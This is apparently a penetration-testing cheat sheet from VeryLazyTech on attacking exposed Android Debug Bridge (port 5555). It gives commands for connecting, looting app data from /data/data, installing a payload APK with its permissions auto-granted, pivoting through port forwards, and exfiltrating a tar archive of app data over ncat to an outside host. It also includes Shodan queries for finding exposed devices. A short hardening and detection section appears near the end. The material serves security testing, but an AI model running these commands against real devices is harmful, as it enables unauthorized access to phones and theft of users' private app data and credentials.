# Android Debug Bridge (ADB) - PORT 5555

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## Basic Info

* **Default legacy port:** `5555/tcp` (classic `adb tcpip` mode). Modern Android (11+) uses TLS pairing and mDNS — ports are dynamic.
* If you can reach `adbd` you can often get a shell (`adb shell`), install APKs, steal app data, and pivot.
* **High risk:** any reachable adbd (TCP) should be treated as compromise-level. Block it and monitor mDNS records.

### What is ADB?

ADB (Android Debug Bridge) is a command-line tool to communicate with Android devices and emulators. Typical actions include installing packages, debugging, and getting an interactive Unix shell on the device.

Modern wireless debugging (Android 11+) adds TLS pairing and mDNS discovery — which changes the offensive surface: ports are discovered via mDNS and pairing is required for secure connections.

 **Nmap fingerprint** (legacy):

```
PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```

***

## Enumeration

### Quick Recon & Connect

If you find ADB exposed and reachable, act fast — many devices are ephemeral or reboot into safe modes.

```bash
# Classic connect (legacy adb tcpip mode)
adb connect <ip>[:<port>]      # default port 5555
adb devices -l                 # ensure device shows as "device"
adb shell                      # interactive shell (usually uid `shell`)
whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
adb root || true               # works on eng/userdebug/insecure builds, many emulators/IoT
```

* If `ro.adb.secure=1` (ADB auth), you need to be pre-authorized or use Android 11+ pairing flow.
* Many vendor engineering images, devkits, emulators, TVs, STBs run `adbd` without auth or as root.

***

## Quick Post‑Exploitation Checklist

1. **Validate privileges & context**

```bash
id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint
```

2. **Enumerate apps & locate data**

```bash
pm list packages -3                # third-party packages
pm path <pkg>                      # path to apk
# For debuggable apps without root
run-as <pkg> sh -c 'cd /data/data/<pkg> && tar cf - .' | tar xf - -C ./loot/<pkg>

# With root
cp -a /data/data/<pkg> /sdcard/<pkg>
exit
adb pull "/sdcard/<pkg>"          # pull files to host
```

**Artifacts of interest (root required):**

* `/data/system/users/0/accounts.db` (AccountManager)
* `/data/misc/wifi/` (saved networks / keys on older versions)
* App SQLite DBs and `shared_prefs` under `/data/data/`

> Note: Chrome and some apps encrypt or use OS-level protections — treat with care and follow legal/ethical rules.

***

## Code Execution & Payload Delivery

* Install and auto‑grant runtime permissions:

```bash
adb install -r -g payload.apk         # -g grants runtime perms in manifest
adb shell monkey -p <pkg> -c android.intent.category.LAUNCHER 1
```

* Directly start components:

```bash
adb shell am start -n <pkg>/<activity>
adb shell am startservice -n <pkg>/<service>
adb shell am broadcast -a <action>
```

***

## Port Forwarding & Pivoting

Even without root, ADB is a great pivoting tool:

```bash
# Host -> device (access device-local service from host)
adb forward tcp:2222 tcp:22
adb forward tcp:8081 tcp:8080

# Device -> host (device can reach host services)
adb reverse tcp:1080 tcp:1080
```

**File exfil over sockets (no sdcard writes):**

```bash
# On host:
ncat -lvp 9000 > dump.tar
# On device (root or run-as as applicable):
adb shell "tar cf - /data/data/<pkg>" | ncat <HOST_IP> 9000
```

***

## Wireless Debugging (Android 11+)

Android 11+ uses TLS-protected wireless debugging with device-side pairing and mDNS discovery:

```bash
# On device: Developer options -> Wireless debugging -> Pair device
# On attacker host (same L2 network, mDNS allowed):
adb pair <device_ip>:<pair_port>   # enter 6-digit code shown on device
adb mdns services                  # discover _adb-tls-connect._tcp / _adb._tcp
adb connect <device_ip>:<conn_port>
```

**mDNS service names:**

* `_adb-tls-pairing._tcp` (pairing)
* `_adb-tls-connect._tcp` (paired connect)
* `_adb._tcp` (legacy/plain)

Notes:

* Ports are dynamic — don’t assume `5555`.
* If mDNS is filtered, legacy `adb tcpip 5555` (USB-assisted) may still enable legacy mode until reboot.
* Attackers with UI access or an MDM misconfig can enable wireless debugging and view pairing codes — establishing long-lived access.

***

## Hardening & Detection (Defender Playbook)

Assume any reachable `adbd` is a high‑severity risk.

**Immediate hardening steps:**

```bash
# On device under your control
settings put global adb_enabled 0
setprop service.adb.tcp.port -1   # disable TCP listening (or: adb usb)
stop adbd; start adbd               # restart daemon
```

**Network & monitoring:**

* Block inbound `TCP/5555` and ADB-related dynamic ports on untrusted segments.
* Block or monitor mDNS records: `_adb._tcp`, `_adb-tls-connect._tcp`, `_adb-tls-pairing._tcp`.
* Inventory devices for insecure builds: check `getprop ro.debuggable`, `ro.build.type`, `ro.adb.secure`.
* Revoke USB debugging authorizations in Developer options for managed devices.

***

## Shodan Search&#x20;

```
"android debug bridge"
port:5555 product:"Android Debug Bridge"
```

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚

</details>
{% endhint %}